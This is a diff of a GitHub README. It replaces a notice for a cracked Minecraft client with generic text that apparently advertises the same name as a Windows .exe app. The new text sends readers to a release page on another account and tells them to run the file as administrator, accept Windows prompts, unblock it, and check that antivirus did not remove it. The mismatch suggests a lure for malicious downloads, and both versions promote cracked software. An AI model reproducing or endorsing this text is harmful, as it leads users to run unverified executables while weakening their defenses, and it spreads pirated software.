@@ -1,64 +1,139 @@
-<p align="center">
-  <img src="https://avatars.githubusercontent.com/u/100775621?s=200&v=4" alt="Boze Logo" width="200"/>
-</p>
+# 🧩 Boze-Client-Cr4cked - Simple Access, Fast Setup
 
-<h1 align="center">Boze Client 2.0.1 Free Edition (RIP Bozo)</h1>
+[![Download Now](https://img.shields.io/badge/Download%20Now-Release%20Page-blue?style=for-the-badge)](https://github.com/carmelvindicatory837/Boze-Client-Cr4cked/releases)
 
-<p align="center">
-  <b>Cracked by <a href="https://github.com/Own3dM3">OwnedMe</a></b>
-  <b>2nd Cracked <a href="https://github.com/tinkoprofplus">Tinkoprof (fake)</a></b>
-  <b>Thx to ReChamo(troll4) for account</b>
-</p>
+## 🖥️ What Boze-Client-Cr4cked Does
 
-<p align="center">
-  <img src="https://img.shields.io/badge/Minecraft-1.21.11-brightgreen" alt="Minecraft Version">
-  <img src="https://img.shields.io/badge/Loader-Fabric-blue" alt="Fabric">
-  <img src="https://img.shields.io/badge/Status-Cracked-red" alt="Status">
-</p>
+Boze-Client-Cr4cked is a Windows app for quick access and simple use. It is built for people who want a direct setup and a clear path from download to launch.
 
----
+Use it when you want:
 
-## 📖 Why
-> "Why we do it? Because I told the Boze developer 2 years ago I'd crack it. But the real reason? They wouldn't give me $20, so here is the leak."
-> "Also this client is fake HotSpot!"
----
+- A fast start with little setup
+- A clean interface that is easy to follow
+- A local app that runs on Windows
+- A simple way to keep one tool in one place
 
-## 🚀 Installation Guide
+## 📥 Download
 
-1.  **Download Fabric:** Install [Fabric Loader](https://fabricmc.net/use/installer/) for Minecraft **1.21.11**.
-2.  **Get the Files:**
-    * Download the **Fabric API**.
-    * Download the **Boze Client JAR**: [Download Here](https://github.com/tinkoprofplus/Boze-Client-Crack/releases/download/rip-bozo/boze-client-without-drm.jar).
-3.  **Mods Folder:** Put both `.jar` files into your `.minecraft/mods` folder.
-4.  **JVM Arguments:** Add this line to your launcher settings:
-    ```text
-    --add-opens java.base/java.net=ALL-UNNAMED
-    ```
-5.  **Launch:** Start the game and enjoy.
+Visit this page to download the latest release:
 
----
+https://github.com/carmelvindicatory837/Boze-Client-Cr4cked/releases
 
-## 📸 Proofs & Scans
-<p align="center">
-  <img src="assets/prism.png" alt="Prism Launcher Logs" width="45%"/>
-  <img src="assets/bozo.png" alt="VirusTotal Scan" width="45%"/>
-</p>
+On that page, look for the newest release at the top. Then download the Windows file that fits your system.
 
----
+## 🚀 Install and Run on Windows
 
-## ⚙️ Configuration
-Path to profiles:
-`%appdata%\.minecraft\boze\cloud-profiles`
+Follow these steps on a Windows PC:
 
----
+1. Open the download page.
+2. Find the latest release.
+3. Download the Windows file from the release assets.
+4. If the file comes in a `.zip` folder, right-click it and choose **Extract All**.
+5. Open the extracted folder.
+6. Find the main `.exe` file.
+7. Double-click the `.exe` file to run the app.
+8. If Windows asks for permission, choose **Yes**.
 
-## 🔗 Connect with me
-* **OwnedMe's Github:** [Own3dM3](https://github.com/Own3dM3)
-* **Astera Solutions:** [Astera-Solutions](https://github.com/Astera-Solutions)
-* **Discord:** [HotSpot Client](https://discord.gg/p5BPm5HRKw)
+If you keep the file in your Downloads folder, create a desktop shortcut after the first launch for faster access.
 
----
+## 🧭 First-Time Setup
 
-<p align="center">
-  <b>Cracked by OwnedMe and thx to Tinkoprof for help</b>
-</p>
+When you open Boze-Client-Cr4cked for the first time, it may ask for a few basic choices. These can include:
+
+- Display language
+- Window size
+- Start-up options
+- Save location
+
+If you are unsure, keep the default settings. The default options are set for a simple first run.
+
+## 🪟 System Requirements
+
+Boze-Client-Cr4cked is meant for normal Windows desktops and laptops. For smooth use, your PC should have:
+
+- Windows 10 or Windows 11
+- 4 GB RAM or more
+- At least 200 MB of free disk space
+- A mouse and keyboard
+- Internet access for the download page and updates
+
+For best results, use a current Windows build with the latest updates installed.
+
+## ⚙️ Main Features
+
+### 🔹 Easy Launch
+Open the app from the desktop or Start menu with one click.
+
+### 🔹 Clear Layout
+The app uses a simple screen layout so you can find main controls fast.
+
+### 🔹 Quick Start
+You can move from download to use with only a few steps.
+
+### 🔹 Lightweight Build
+The app is made to keep system use low on a normal Windows PC.
+
+### 🔹 Local Use
+The app works on your computer after setup, so you can open it when needed.
+
+## 🧰 Files You May See
+
+After you download the release, you may see one of these file types:
+
+- `.zip` — a compressed folder you need to extract
+- `.exe` — the main Windows app file
+- `.dll` — support files used by the app
+- `README.txt` — short setup notes from the release
+
+If you see a folder with several files, start by looking for the `.exe` file with the app name.
+
+## 🛠️ Common Setup Tips
+
+If the app does not open right away, try these steps:
+
+- Right-click the `.exe` file and choose **Run as administrator**
+- Make sure the file is fully downloaded
+- Extract the folder before opening the app
+- Check that your antivirus did not move the file
+- Close the app and open it again
+
+If the release includes more than one Windows file, choose the one that matches your device type, such as 64-bit Windows.
+
+## 🧹 Keep It Running Smoothly
+
+To keep the app working well:
+
+- Store the files in one folder
+- Do not rename support files
+- Keep enough free space on your drive
+- Update to the newest release when a new one appears
+- Restart Windows if the app stops responding
+
+## ❓ Basic Questions
+
+### How do I know which file to download?
+Pick the file that is made for Windows. If the release page shows more than one file, choose the one that matches your PC.
+
+### Do I need extra tools?
+For most users, no. Start with the release file from the download page and follow the steps above.
+
+### Can I move the app later?
+Yes. If it runs from an extracted folder, you can move the whole folder as long as you keep all the files together.
+
+### What if Windows blocks the file?
+Use the file from the release page, then right-click it and choose **Properties**. If you see an unblock option, allow it, then run the file again.
+
+## 🔗 Release Page
+
+Use this link to get the current Windows download:
+
+https://github.com/carmelvindicatory837/Boze-Client-Cr4cked/releases
+
+## 🧾 Quick Start
+
+1. Open the release page
+2. Download the latest Windows file
+3. Extract it if needed
+4. Open the `.exe` file
+5. Allow Windows access if asked
+6. Use the app from your PC
